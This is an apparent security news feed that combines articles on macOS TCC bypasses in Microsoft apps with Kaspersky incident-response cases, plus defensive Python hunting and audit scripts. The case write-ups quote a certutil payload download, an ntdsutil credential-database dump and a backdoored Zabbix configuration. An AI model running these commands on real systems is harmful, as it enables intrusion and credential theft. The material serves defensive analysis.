

Microsoft apps on macOS can be used to access the user's confidential data


Security researchers have discovered eight new vulnerabilities in the macOS versions of Microsoft applications (Outlook, Teams, Word, Excel, PowerPoint and OneNote) which, if exploited, let attackers escalate privileges and gain access to confidential data.

According to a write-up by Cisco Talos, the identified flaws help bypass the operating system's privacy settings, which are built on the TCC (Transparency, Consent and Control) framework.

"If an attacker exploits the discovered vulnerabilities, they will be able to obtain all the rights granted by Microsoft to the affected applications," the experts write.

"For example, an attacker could send emails from the victim's account, as well as record audio and video, without any interaction with the targeted user," they added.

In theory, an attacker can inject malicious libraries into any of these applications, which would let them not only obtain that application's rights but also extract a range of confidential data. As the experts note, successful exploitation requires the attacker to already have some access to the victim's system.

TCC and data protection


TCC enforces a policy that requires applications to obtain the user's explicit consent before they can access protected resources such as contacts, calendars, photos and location, ensuring that users keep direct control over their personal information and over which applications can reach their data.

TCC works together with entitlements, a set of capabilities an app requests in order to function. Developers pick these entitlements from a selection provided by Apple; only a subset of all possible entitlements is available for general use, and the most powerful ones are reserved exclusively for Apple's own system applications and binaries.

When an application with specific entitlements first asks to use a particular capability, a permission pop-up is shown.
[Image: TCC permission prompt, "Malevolent App" would like to access the camera]
The image above shows an example of such a permission request: "Malevolent App" would like to access the camera. The user must decide whether to allow or deny camera access. That decision is then recorded in the TCC database.

Once the user has made a choice, any future camera request from "Malevolent App" is governed by the decision recorded in the database. This system effectively lets users control, and be informed of, the privacy-sensitive actions an application intends to perform. That required user interaction is what allows users to stop malicious applications from carrying out sensitive actions such as recording video or taking photos.

A user can later review this permission in the "Privacy & Security" section of macOS "System Settings", which lists permission categories including Camera, Microphone and Location Services.
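The practical consequence of the article's point is that TCC grants belong to the application's identity, so any library that gets loaded into the process inherits them. As an added example (not code from the Cisco Talos write-up or from the article above), the Python script below reads an entitlements plist, the kind of XML that `codesign -d --entitlements :- /path/to/App.app` prints, and reports which TCC-gated resources the app declares together with whether it opts out of the hardened runtime's library validation. The entitlement keys are Apple's standard names; the two sample plists are constructed for the example and do not describe any real Microsoft application.

```python
import plistlib
import sys

# Standard Apple entitlement keys that correspond to TCC-protected resources.
# The keys are Apple's; the pairing with the resource name a TCC prompt shows is ours.
TCC_ENTITLEMENTS = {
    "com.apple.security.device.camera": "Camera",
    "com.apple.security.device.audio-input": "Microphone",
    "com.apple.security.personal-information.addressbook": "Contacts",
    "com.apple.security.personal-information.calendars": "Calendars",
    "com.apple.security.personal-information.location": "Location Services",
    "com.apple.security.personal-information.photos-library": "Photos",
}

# Hardened-runtime entitlements that let code the app's developer never signed run
# inside the app's process. Any such code inherits whatever TCC has granted the app.
INJECTION_ENTITLEMENTS = {
    "com.apple.security.cs.disable-library-validation":
        "library validation disabled: dylibs not signed by the app's team or Apple will load",
    "com.apple.security.cs.allow-dyld-environment-variables":
        "DYLD_* variables honoured: the loader can be pointed at an attacker's library",
}


def audit_entitlements(plist_bytes: bytes) -> dict:
    """Summarise what an entitlements plist lets a process do, TCC-wise."""
    ents = plistlib.loads(plist_bytes)
    resources = sorted(name for key, name in TCC_ENTITLEMENTS.items() if ents.get(key) is True)
    weaknesses = [why for key, why in INJECTION_ENTITLEMENTS.items() if ents.get(key) is True]
    return {
        "tcc_resources": resources,
        "injection_weaknesses": weaknesses,
        # The combination to worry about: the app can ask for camera/mic/contacts AND
        # will load foreign code, so injected code gets those grants without a prompt.
        "inherits_tcc_via_injection": bool(resources) and bool(weaknesses),
    }


# Constructed sample plists (not dumped from any real application).
RISKY_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>com.apple.security.app-sandbox</key><true/>
  <key>com.apple.security.device.camera</key><true/>
  <key>com.apple.security.device.audio-input</key><true/>
  <key>com.apple.security.personal-information.addressbook</key><true/>
  <key>com.apple.security.cs.disable-library-validation</key><true/>
</dict></plist>"""

HARDENED_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>com.apple.security.app-sandbox</key><true/>
  <key>com.apple.security.device.camera</key><true/>
  <key>com.apple.security.device.audio-input</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    # Usage: python3 tcc_audit.py entitlements.plist  (saved output of codesign -d --entitlements :- App.app)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else RISKY_PLIST
    for field, value in audit_entitlements(data).items():
        print(f"{field}: {value}")
```

The script only reads what the app declares; whether the user has actually granted Camera or Microphone is recorded in the TCC database, so a "true" here means the app can prompt for, and may already hold, that access.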

The article Microsoft apps on macOS can be used to access the user's confidential data originally appeared on il blog della sicurezza informatica.




Why London's next strategy paper also concerns Rome

The echo of the Strategic Defence Review (SDR) announced by the new British prime minister Keir Starmer has reached Italy too, on the wings of the Global Combat Air Programme (GCAP). While Guido Crosetto, the defence minister, and Leonardo's leadership have expressed confidence in the stability of the



New British helicopter. Leonardo heads for the one-billion contract

Italy's Leonardo is the only company left in the running for the contract, estimated at one billion pounds (1.19 billion euros), to renew the rotary-wing component of the British armed forces. The withdrawal of Airbus and Sikorsky (a Lockheed Martin group company) from the tender for the programme



Security experts? You are the most sought after! In public administration, 46% of cybersecurity positions are vacant


A global survey commissioned by Kaspersky Lab found that 41% of companies are in desperate need of information security specialists. Cyber threat experts and malware analysis specialists are the most in demand (39% each).

There is also a shortage of SOC analysts (35%), pentest and network security specialists (33%) and threat intelligence analysts (32%). Broken down by sector, the shortage of information security staff is felt most in the public sector, where almost half of vacancies go unfilled (46%).

Telecommunications and media come second (39%), retail and healthcare third (37% each). Information security is best covered in the IT and financial sectors (31% and 27% respectively).

The survey, conducted by Grand View Research in 29 countries, involved 1,012 company representatives in various positions: managers (IT, SOC), lead specialists and information security experts.

"We see strong demand in particular for engineers who implement information security, for SOC analysts and for secure development specialists," said Vladislav Galimov, head of Kaspersky's information security recruitment group.

"We also believe that in the near future the need for experts in artificial intelligence and neural network security will start to grow." Similar results were obtained by a comparable study of the information security job market conducted by Angara Security.

According to the service provider, the number of vacancies in information security grew by 27% last year.

According to experts, the growing shortage of information security staff is directly linked to the general push towards digitalisation of the economy and to tighter regulatory security requirements in the face of the growing number and complexity of cyberattacks.

The article Security experts? You are the most sought after! In public administration, 46% of cybersecurity positions are vacant originally appeared on il blog della sicurezza informatica.



Robots and infantry together. The US Army wants more drones for its ground forces

The US Army has signed a framework contract worth up to 990 million dollars with AeroVironment for the supply of Switchblade loitering munitions. Switchblade loitering munitions come in the 300 (2.5



A deep dive into the most interesting incident response cases of last year



In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our annual report, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual DFIRMA report webinar.

The insider fraud attack



A group of employees at a government organization identified an internal service that allowed them to create legitimate-looking transactions which, while not direct money transfers, could cause monetary losses for the organization. These losses could reach millions of dollars.

The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:

A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.


Numerous logs for the application in question, as well as VPN access and network activity logs, were requested for analysis, and the employees involved in the fraudulent activity were identified. Two separate cases were analyzed in which abuse of the transaction configuration was confirmed: one exploited a weakness in a debugging interface, the other misused the privileges of a valid account.

In the first case, GERT identified a misconfiguration that the adversaries abused to steal other users' cookies and impersonate them and their activity. An application on one of the analyzed systems logged exception details that included the cookies of the user who hit the exception; the same log entries let us determine which user was involved.
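The mechanism in that first case is an ordinary one: an exception handler that serialises the whole request, cookies included, into a log that many people can read. As an added example, not code from the GERT report or from the affected application, the Python below shows that logging pattern next to a version that redacts credential-bearing headers, plus the small hunting helper an investigator would use to enumerate every session token such a log has already leaked. The request object, header names and log format are constructed for the example.

```python
import io
import json
import logging
import re

# Header names whose values are credentials; keep this list with the app, not in an analyst's head.
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization", "x-api-key", "x-csrf-token"}


def log_exception_unsafe(logger: logging.Logger, request: dict, exc: Exception) -> None:
    """The anti-pattern: dump the whole request on an unhandled exception."""
    logger.error("unhandled %r on %s headers=%s",
                 exc, request["path"], json.dumps(request["headers"]))


def redact_headers(headers: dict) -> dict:
    return {name: ("<redacted>" if name.lower() in SENSITIVE_HEADERS else value)
            for name, value in headers.items()}


def log_exception_safe(logger: logging.Logger, request: dict, exc: Exception) -> None:
    """Same diagnostic value (path, exception, benign headers) without the session token."""
    logger.error("unhandled %r on %s headers=%s",
                 exc, request["path"], json.dumps(redact_headers(request["headers"])))


def capture_log(handler_fn, request: dict, exc: Exception) -> str:
    """Run one of the two handlers with an in-memory log sink and return what it wrote."""
    buf = io.StringIO()
    logger = logging.getLogger(f"demo.{handler_fn.__name__}")
    logger.propagate = False
    logger.handlers = [logging.StreamHandler(buf)]
    logger.setLevel(logging.ERROR)
    handler_fn(logger, request, exc)
    return buf.getvalue()


def find_leaked_sessions(log_text: str) -> list:
    """DFIR helper: pull cookie values out of a log written with the unsafe pattern,
    so every leaked session can be revoked and its later use traced in access logs."""
    return re.findall(r'"Cookie": "([^"<]+)"', log_text)


# Constructed request, in the shape a web framework hands to an error handler.
SAMPLE_REQUEST = {
    "path": "/transactions/create",
    "headers": {"Host": "internal.example", "Cookie": "session=9f1c2d3e4a5b", "User-Agent": "Mozilla/5.0"},
}

if __name__ == "__main__":
    exc = ValueError("invalid account count")
    print(capture_log(log_exception_unsafe, SAMPLE_REQUEST, exc), end="")
    print(capture_log(log_exception_safe, SAMPLE_REQUEST, exc), end="")
```

Redacting at the logging call is the fix for the application; for the investigation, the list returned by find_leaked_sessions is the set of sessions that must be treated as compromised from the time the log became readable.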

In the other case, one user modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service while attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system, from which yet another user was accessing the transaction system. That access was initially catalogued as legitimate activity but was later confirmed to be part of the malicious activity.

Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.

GERT's analysis confirmed the collusion of a user involved in the transaction requests, identified the sources, and linked the user's activity to the various systems involved in the investigation, including local and remote IDs. The customer used this information in a timely manner to take legal action against the insider and his accomplices.

MITRE ATT&CK techniques

Tactic | Technique used | Technique ID | Details
Initial Access, Persistence | Valid Accounts | T1078 | The adversaries used legitimate credentials to access the VPN and the internal service
Initial Access | External Remote Services | T1133 | The adversary used the customer's VPN service to gain network access to the internal service
Credential Access | Steal Web Session Cookie | T1539 | The adversary abused a misconfiguration in the transactions service to steal other users' cookies
Impact | Data Manipulation | T1565 | After impersonating other users with privileges to create transactions, the adversary started creating unauthorized transactions on their behalf

Flax Typhoon/SLIME13 APT attack



After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our platforms detected the presence of well-known software installed on the customer’s premises without their knowledge.

Although these applications were legitimate, attackers used them to gain persistent access to the victim’s environment.

In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name conhost.exe, but the service was started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.

The supposed conhost application was downloaded to the system by a legitimate local user using certutil, a well-known Windows LOLBin, and then installed from the command line as a system service:
certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe
Another suspicious service, masquerading as wshelper.dll, was observed on a different host. This DLL belonged to the Zabbix agent, which is normally deployed on a monitoring target to actively monitor local resources and applications.

Analysis of the sample confirmed that the configuration file allowed remote commands, taking advantage of the passive and active checks the Zabbix agent supports:
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
Port 5432 was allowed to listen by a firewall rule with the "smart" name PGSQL, so that a rule for PostgreSQL's default port would look legitimate to anyone reviewing the firewall.

GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q
c:\windows\sysvol\domain\ntds\active directory\ntds.dit"
During those two years of intrusion, security controls detected and contained multiple attempts to run offensive tools such as Mimikatz and Cobalt Strike, but the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT's analysis confirmed that the infrastructure had been compromised since mid-2021. The attackers' artifacts and TTPs resemble those of the Flax Typhoon APT group, which uses minimal malware and few custom payloads and instead relies heavily on legitimate applications.
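The three artifacts in this case (a service named after a system binary but running from the wrong folder, certutil used as a downloader, and a Zabbix agent configured to take commands from anyone) are all cheap to hunt for with telemetry most environments already collect. As an added example, not part of the GERT report, the Python below implements those three checks over constructed inputs: service-install records in the shape of a parsed System log event 7045, process command lines, and a zabbix_agentd.conf. The sample records are modelled on what the write-up describes, not taken from the incident, and the 203.0.113.5 address is a documentation placeholder.

```python
import re
from pathlib import PureWindowsPath

# Windows binaries whose names attackers borrow for look-alike services (conhost.exe in this case).
SYSTEM_BINARY_NAMES = {"conhost.exe", "svchost.exe", "lsass.exe", "csrss.exe", "wininit.exe", "dllhost.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def masquerading_services(service_events: list) -> list:
    """service_events: dicts in the shape of a parsed System log event 7045 (service installed).
    Flags services whose image is named like a system binary but lives outside System32/SysWOW64."""
    hits = []
    for ev in service_events:
        image = PureWindowsPath(ev["image_path"])
        in_system_dir = str(image.parent).lower().startswith(SYSTEM_DIRS)
        if image.name.lower() in SYSTEM_BINARY_NAMES and not in_system_dir:
            hits.append(ev)
    return hits


CERTUTIL = re.compile(r"\bcertutil(?:\.exe)?\b", re.I)
URL = re.compile(r"\bh(?:xx|tt)ps?://\S+", re.I)   # also accepts the defanged hxxp:// used in reports


def certutil_downloads(command_lines: list) -> list:
    """Process-creation command lines where certutil is used as a downloader (T1105)."""
    hits = []
    for cmd in command_lines:
        url = URL.search(cmd)
        if CERTUTIL.search(cmd) and "-urlcache" in cmd.lower() and url:
            hits.append((cmd, url.group(0)))
    return hits


def audit_zabbix_agent_conf(text: str) -> list:
    """Flag settings that turn a Zabbix agent into a remote shell for whoever can reach it."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    findings = []
    if conf.get("EnableRemoteCommands") == "1":   # agents before 5.0; 5.0+ use AllowKey=system.run[*]
        findings.append("remote commands enabled")
    if conf.get("AllowKey", "").startswith("system.run"):
        findings.append("system.run[] allowed")
    if conf.get("Server") in ("0.0.0.0/0", "::/0"):
        findings.append("any address may act as the Zabbix server")
    if conf.get("LogFile", "") in ("", "0"):
        findings.append("agent logging disabled")
    if conf.get("ListenPort", "10050") != "10050":
        findings.append(f"non-default listen port {conf['ListenPort']}")
    return findings


# Constructed sample telemetry, modelled on the artifacts described in the write-up.
SERVICE_EVENTS = [
    {"host": "srv01", "service": "conhost", "image_path": r"C:\Windows\System32\conhost.exe"},
    {"host": "srv02", "service": "conhost", "image_path": r"C:\ProgramData\conhost.exe"},
    {"host": "srv03", "service": "wshelper", "image_path": r"C:\Users\Public\wshelper.dll"},
]
COMMAND_LINES = [
    r"certutil.exe -urlcache -split -f hxxp://203.0.113.5/conhost.exe",
    r"certutil.exe -hashfile C:\Windows\System32\ntoskrnl.exe SHA256",   # benign use of certutil
    r"powershell.exe -c Get-Process",
]
ZABBIX_CONF = """EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
"""

if __name__ == "__main__":
    print(masquerading_services(SERVICE_EVENTS))
    print(certutil_downloads(COMMAND_LINES))
    print(audit_zabbix_agent_conf(ZABBIX_CONF))
```

The Zabbix check is the one worth scheduling: a monitoring agent that accepts commands from any server address is a backdoor whether or not an attacker installed it, and the hardened form (Server restricted to the real Zabbix servers, logging on, default port, no system.run) is what the audit should return nothing for.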

MITRE ATT&CK techniques

Tactic | Technique used | Technique ID
Initial Access | Exploit Public-Facing Application | T1190
Resource Development | Develop Capabilities: Malware | T1587.001
Credential Access | OS Credential Dumping: LSASS Memory | T1003.001
Credential Access | OS Credential Dumping: Security Account Manager | T1003.002
Command and Control | Protocol Tunneling | T1572
Command and Control | Ingress Tool Transfer | T1105
Credential Access | Brute Force: Password Spraying | T1110.003
Execution | Exploitation for Client Execution | T1203
Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001
Lateral Movement | Remote Services: SMB/Windows Admin Shares | T1021.002
Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036.005

The MFA lack of control



After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was targeted by a spear-phishing attack.

The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.

Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a phishing kit configured to automatically steal the MFA tokens.

The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company’s headquarters. The attackers also configured additional MFA devices to access the target user’s mailbox contents without being noticed and without tampering with the original mailbox.

The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.

One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured “send as” privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.

Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.

Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.

A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.

GERT's analysis confirmed the initial attack date and vector, the compromised users and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing the Microsoft 365 unified audit log (UAL) and additional cloud logs, as well as firewall logs and the client's own system logs, GERT was able to provide a complete timeline detailing every technique the fraudsters used.
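The timeline GERT reconstructed hangs on a handful of audit-log events: a sign-in from an unfamiliar location, a new MFA method added to the same account shortly afterwards, SendAs grants, and inbox rules that forward or delete mail. As an added example, not the report's own tooling, the Python below runs those checks over constructed records in the shape of unified audit log entries. The operation names (UserLoggedIn, "Update user.", New-InboxRule, Add-RecipientPermission, Add-MailboxPermission) are the ones Microsoft 365 actually logs; the accounts, timestamps, IT home country and "user" meaning the affected account are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

HOME_COUNTRIES = {"IT"}   # assumption: where this company's staff normally sign in from
RULE_RED_FLAGS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo", "DeleteMessage", "SoftDeleteMessage")


def triage(events: list, home_countries=HOME_COUNTRIES) -> dict:
    """Group UAL-style records per affected account and emit the findings a BEC investigation looks for."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_user[ev["user"]].append(ev)

    findings = defaultdict(list)
    for user, evs in by_user.items():
        foreign_logins = [datetime.fromisoformat(e["ts"]) for e in evs
                          if e["op"] == "UserLoggedIn" and e.get("country") not in home_countries]
        for e in evs:
            t, detail = datetime.fromisoformat(e["ts"]), e.get("detail", "")
            if e["op"] == "Update user." and "StrongAuthenticationMethod" in detail:
                # A new MFA method right after a foreign sign-in is the attacker enrolling their own device.
                if any(timedelta(0) <= t - fl <= timedelta(hours=24) for fl in foreign_logins):
                    findings[user].append(f"{e['ts']} MFA method changed within 24h of a sign-in from outside {sorted(home_countries)}")
            elif e["op"] in ("New-InboxRule", "Set-InboxRule") and any(f in detail for f in RULE_RED_FLAGS):
                findings[user].append(f"{e['ts']} inbox rule that forwards or deletes mail: {detail}")
            elif e["op"] == "Add-RecipientPermission" and "SendAs" in detail:
                findings[user].append(f"{e['ts']} SendAs granted: {detail}")
            elif e["op"] == "Add-MailboxPermission" and "FullAccess" in detail:
                findings[user].append(f"{e['ts']} FullAccess granted: {detail}")
    return dict(findings)


# Constructed records; the country field stands in for the geolocation most SIEMs add to ClientIP.
EVENTS = [
    {"ts": "2023-10-06T09:12:00", "user": "approver@corp.example", "op": "UserLoggedIn", "ip": "203.0.113.7", "country": "NL"},
    {"ts": "2023-10-06T09:20:00", "user": "approver@corp.example", "op": "Update user.", "detail": "StrongAuthenticationMethod"},
    {"ts": "2023-10-02T10:00:00", "user": "clerk@corp.example", "op": "New-InboxRule", "detail": "MoveToFolder=Newsletters"},
    {"ts": "2023-11-05T08:02:00", "user": "admin@corp.example", "op": "Add-RecipientPermission", "detail": "AccessRights=SendAs;Trustee=treasury@corp.example"},
    {"ts": "2023-11-05T08:05:00", "user": "admin@corp.example", "op": "New-InboxRule", "detail": "From=bank.example;DeleteMessage=True"},
    {"ts": "2023-11-05T08:06:00", "user": "admin@corp.example", "op": "New-InboxRule", "detail": "ForwardTo=external@mail.example"},
]

if __name__ == "__main__":
    for user, items in triage(EVENTS).items():
        print(user)
        for item in items:
            print("   ", item)
```

Two points the case makes and the code reflects: the rule-based checks fire on their own, but the MFA check is only meaningful in sequence with the foreign sign-in, and the privileged account here has no UserLoggedIn record to anchor to because it never had MFA at all, which is exactly why it was the one the attackers used for the transfer.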

MITRE ATT&CK techniques

Tactic | Technique used | Technique ID | Details
Initial Access | Phishing: Spearphishing Link | T1566.002 | Targeted attack against the customer's domain from October 6, 2023
Persistence | Account Manipulation: Device Registration | T1098.005 | Multiple authentication methods enabled for a compromised user
Credential Access | Brute Force: Password Guessing | T1110.001 | Failed access attempts on behalf of multiple users
Credential Access | Brute Force: Password Spraying | T1110.003 | Access attempts using credentials confirmed as stolen by infostealer malware
Privilege Escalation | Account Manipulation: Additional Email Delegate Permissions | T1098.002 | New permissions configured to avoid detection and to access other mailboxes
Persistence | Email Collection: Email Forwarding Rule | T1114.003 | New rules configured to evade detection and remain persistent

ToddyCat-like APT attack with an ICMP backdoor



Kaspersky's Managed Detection and Response (MDR) service was alerted to suspicious activity on domain controllers and Exchange servers.

GERT was contacted to investigate the case; our analysis confirmed SMB abuse and exploitation of the IKEEXT service, as well as exploitation of the Microsoft Exchange Server vulnerability CVE-2021-26855 (part of the ProxyLogon chain leading to remote code execution).

One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the wlbsctrl.dll library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.

IKEEXT is a default service on Windows. It is invoked by the svchost process, which loads ikeext.dll, the DLL responsible for the IKEEXT service.


The ikeext.dll library, in turn, tries to load a DLL named wlbsctrl.dll, which is default Windows behavior. The svchost process hosting IKEEXT always runs on the system, but wlbsctrl.dll does not exist in the file system by default, and this is where the threat actors saw an opportunity.


The threat actors created a malicious version of wlbsctrl.dll and saved it on the system. Because of this Windows behavior, the DLL was loaded every time the service started, without any Run key or other Autorun registration, which is what is commonly used for persistence and therefore commonly monitored.


Besides persistence, in the investigated incident the threat actor used the IKEEXT weakness to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits dllhost.exe to listen on the custom port 52415. All of this was achieved by placing the backdoored wlbsctrl.dll in the System32 folder, where the legitimate library would normally be stored (if present on the system).

Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered samples were similar except for the following points:

  • Some differences in the PE header (normal behavior between similar samples);
  • Different mutex strings, all located at the same raw file offset;
  • Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.

Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following activities:

  • Check for the mutex; if it already exists in memory, terminate the process.
  • Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number (VSN) of the C drive, then use it to set the value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, and then delete the file.
  • Load the contents of the default value of registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, decrypt it again with AES using the same KEY described above, and invoke the payload shellcode.
  • Allocate the shellcode size in a new segment and jump to it.

Note: The calculated REGKEY NAME (Interface {<calculated_for_each_host>}) is based on the VSN of the C drive (without host VSN it is not possible to decrypt correctly).


As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior in the encrypted payload.

The decrypted payload starts with the header "CAFEBABE" (the magic bytes also used by Java class files), followed by the shellcode size and finally the data. This payload executes the following steps:

  1. Decrypt itself (for the third time);
  2. If it is not already running inside dllhost.exe, create a suspended dllhost process with the parameter "/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}", which refers to the COM+ System Application service;
  3. Allocate space to the new process;
  4. Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that’s contained in the small header at offset 0x19FF) into the new allocation;
  5. Patch dllhost (in memory only) to ensure execution at the newly allocated space;
  6. Resume the dllhost process.

The new instance of the shellcode starts again from step one. This time it finds that it is running inside dllhost, decrypts a further section, executes it and listens on port 52415. The final payload injected into dllhost.exe creates a raw ICMP socket, which has no port. It makes no outbound connection (although the payload it receives likely does). Data arrives from an unknown source as a Base64-encoded ICMP packet, is converted to binary, decrypted, and executed directly: space is allocated with VirtualAlloc, the shellcode is copied into it, and control jumps to that address.
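A raw ICMP socket is exactly why this channel passes firewalls that only reason about ports, and it is also why it is easy to spot once someone looks at echo payloads instead of counting pings. As an added example, not code from the investigation or the backdoor itself, the Python below builds well-formed IPv4/ICMP packets with correct checksums, then extracts any echo request or reply whose body is Base64 rather than ordinary ping filler and returns the decoded bytes, which in the case above would be the ciphertext the implant decrypts. The decryption key and algorithm are not reproduced; the "stage" bytes and the 10.0.0.x addresses are constructed for the example.

```python
import base64
import re
import struct

WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"          # default payload of Windows ping.exe
B64_BODY = re.compile(rb"\A[A-Za-z0-9+/]{16,}={0,2}\Z")


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum; returns 0 when run over a message whose checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(payload: bytes, ident: int = 0x1234, seq: int = 1, reply: bool = False) -> bytes:
    itype = 0 if reply else 8
    header = struct.pack("!BBHHH", itype, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", itype, 0, csum, ident, seq) + payload


def build_ipv4(icmp: bytes, src: bytes = b"\x0a\x00\x00\x01", dst: bytes = b"\x0a\x00\x00\x02") -> bytes:
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0, src, dst)
    csum = inet_checksum(header)
    return header[:10] + struct.pack("!H", csum) + header[12:] + icmp


def parse_icmp(packet: bytes):
    """(type, code, payload) from an IPv4 packet carrying ICMP with a valid ICMP checksum, else None."""
    if len(packet) < 28 or packet[0] >> 4 != 4 or packet[9] != 1:
        return None
    icmp = packet[(packet[0] & 0x0F) * 4:]
    if len(icmp) < 8 or inet_checksum(icmp) != 0:
        return None
    return icmp[0], icmp[1], icmp[8:]


def smuggled_payload(packet: bytes):
    """Decoded bytes if an echo request/reply carries a Base64 body that is not ordinary
    ping filler; those bytes are what the implant would decrypt and run. None otherwise."""
    parsed = parse_icmp(packet)
    if parsed is None or parsed[0] not in (0, 8):
        return None
    body = parsed[2]
    if body == WINDOWS_PING_DATA or len(body) % 4 or not B64_BODY.match(body):
        return None
    return base64.b64decode(body, validate=True)


# Constructed traffic: a stand-in blob smuggled in an echo request, plus a Windows ping and a
# Linux-style ping (8-byte timestamp followed by 0x10..0x37) for comparison.
STAGE_BLOB = bytes(range(0x30, 0x50))     # 32 opaque bytes standing in for ciphertext; not shellcode
OPERATOR_PACKET = build_ipv4(build_icmp_echo(base64.b64encode(STAGE_BLOB)))
WINDOWS_PING = build_ipv4(build_icmp_echo(WINDOWS_PING_DATA))
LINUX_PING = build_ipv4(build_icmp_echo(b"\x00" * 8 + bytes(range(0x10, 0x38))))

if __name__ == "__main__":
    for name, pkt in (("operator", OPERATOR_PACKET), ("windows ping", WINDOWS_PING), ("linux ping", LINUX_PING)):
        print(name, smuggled_payload(pkt))
```

On a real capture the same function runs over each frame's IP layer; the Base64 test is a heuristic that will also catch any other text-encoded ICMP tunnel, which is the point of looking at payloads, since the implant's own ICMP type and identifier are unremarkable.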

According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack Tactics, Techniques and Procedures (TTP) used are very similar to the ToddyCat actor, but there’s no solid attribution to this group.

The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.

MITRE ATT&CK techniques

Tactic | Technique used | Technique ID
